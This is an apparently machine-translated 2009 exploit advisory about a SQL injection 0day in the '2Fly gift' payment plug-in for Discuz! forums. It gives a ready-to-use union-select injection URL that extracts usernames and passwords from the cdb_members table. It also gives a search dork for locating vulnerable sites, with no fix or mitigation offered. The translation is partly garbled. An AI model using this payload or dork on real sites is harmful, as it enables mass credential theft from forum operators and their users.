Discuz! Account the issuance of the plug-in injection 0day-vulnerability warning-the black bar safety net

2009-08-14T00:00:00
ID MYHACK58:62200924279
Type myhack58
Reporter 佚名
Modified 2009-08-14T00:00:00

Description

Discuz! Account the issuance of the plug-in injection 0day

Plugin name:2Fly gift(number)payment system 漏洞 文件 :2fly_gift.php Version:latest version Exp:http://www. xxx. com/2fly_gift. php? pages=content&gameid=1 6 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7 from cdb_members 搜索引擎 特征 :inurl:2fly_gift.php On the figure:

!

!